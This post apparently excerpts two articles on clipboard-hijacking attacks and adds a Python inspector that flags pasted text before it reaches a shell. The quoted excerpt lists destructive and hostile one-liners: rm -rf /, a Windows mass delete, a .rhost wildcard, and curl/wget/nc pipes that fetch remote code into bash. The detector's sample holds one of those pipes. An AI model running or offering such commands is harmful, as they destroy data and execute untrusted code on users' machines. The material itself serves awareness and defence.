In an article on The H, they explain why it’s not a good idea to simply copy and paste commands you get from a website tutorial. What looks like a harmless command could be hiding something very dangerous.
When a user pastes what they think is an innocent command that does what the page advertises, a different command is actually executed with their credentials, automatically. This could delete all of their data or send data to a server on the public internet. If the user is still authenticated with sudo on a Linux machine, the command could even be executed with administrator privileges, which could lead to much more dangerous results.
See the article here
User interaction based exploitation: WYSINWYC (What you see is not what you copy)
When working with computers you know whether or not there is a reliable and deterministic way to exploit them; when working with humans there is no such certainty. Technical people often prefer to stay technical and avoid humans. This is in fact our first article on a technique that needs direct human interaction to work.
The presented technique relies on a special kind of “rich text” copy, where the apparently innocuous payload is pasted into a different context that is able to parse it. This applies especially, but by no means only, to online how-tos.
The core concept of the attack is that the displayed text (and thus the data the user thinks they have copied) is different from what the browser has really put on the clipboard.
A list of real-life examples follows, just to give you an idea.
rm -rf /
del /F /S /Q * # windows
/opt/custom/app abuse_my_functionality
echo "*" > ~/.rhost
...
Remote storage over http
GET example.com|bash
wget -q example.com -O-|bash
curl -s example.com|bash
echo -en "GET /\n\n"|nc example.com 80|bash
...
The shortest that comes to my mind is “GET ush.it|sh” (13 chars).
Other remote storage fetch methods
nc example.com
dig AXFR evil.com @evil-dns-with-53-tcp # since zone transfers use TCP
sslclient
...
As you can see, short commands are limited in terms of flexibility, and remote fetch/exec can be rendered useless by network protections (egress filtering, my-work-is-grep IDS) and configuration issues (missing routing, machine offline, personal firewall, etc.).
Excerpted from an article on ush.it
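As an added example (not code from either article), here is a paste inspector that a clipboard manager or terminal wrapper could run over clipboard text before it reaches a shell. It flags the three things the excerpt describes: a line break that would make the text execute on paste, invisible characters the user never saw on the page, and output piped straight into a shell. The sample clipboard content is constructed.

```python
import re
import unicodedata

# "fetch something | hand it to a shell": the remote-storage-over-http idiom the
# article lists (curl -s example.com|bash, GET example.com|bash, ...|nc example.com 80|bash).
PIPE_TO_SHELL = re.compile(r"\|\s*(?:ba|z|da|k)?sh\b")


def hidden_chars(text):
    """Characters that take no space on screen but are still copied (control, format)."""
    return [ch for ch in text
            if unicodedata.category(ch) in ("Cc", "Cf") and ch not in "\r\n\t"]


def inspect_paste(clipboard):
    """Inspect clipboard text before it reaches a shell; return a list of findings.

    Each finding is a dict with a 'kind' and a human-readable 'detail'.
    An empty list means none of the three checks fired.
    """
    findings = []
    # 1. Any line break: a terminal without bracketed paste treats it as Enter, so
    #    everything before it runs immediately, before the user can read it.
    if "\n" in clipboard or "\r" in clipboard:
        lines = [ln for ln in re.split(r"\r\n|\r|\n", clipboard) if ln.strip()]
        findings.append({"kind": "auto_execute",
                         "detail": "%d command line(s) would run on paste: %r" % (len(lines), lines)})
    # 2. Invisible characters: text the user never saw but the browser put on the clipboard.
    hidden = hidden_chars(clipboard)
    if hidden:
        findings.append({"kind": "hidden_chars",
                         "detail": "invisible code points: " + ", ".join("U+%04X" % ord(c) for c in hidden)})
    # 3. Pipe into a shell: the fetch-and-execute pattern from the article's list.
    for m in PIPE_TO_SHELL.finditer(clipboard):
        findings.append({"kind": "pipe_to_shell",
                         "detail": "output piped into a shell at offset %d: %r" % (m.start(), m.group(0))})
    return findings


# Constructed sample: the page displayed "ls -la"; the clipboard actually holds a
# zero-width space, a line break and a fetch-and-execute command from the article's list.
SAMPLE_CLIPBOARD = "ls -la\u200b\ncurl -s example.com|bash\n"

if __name__ == "__main__":
    for f in inspect_paste(SAMPLE_CLIPBOARD):
        print(f["kind"], "-", f["detail"])
```

Bash 5.1 and newer enable bracketed paste by default, which removes the auto-execute case but not the other two, so the pasted text is still worth reading before pressing Enter.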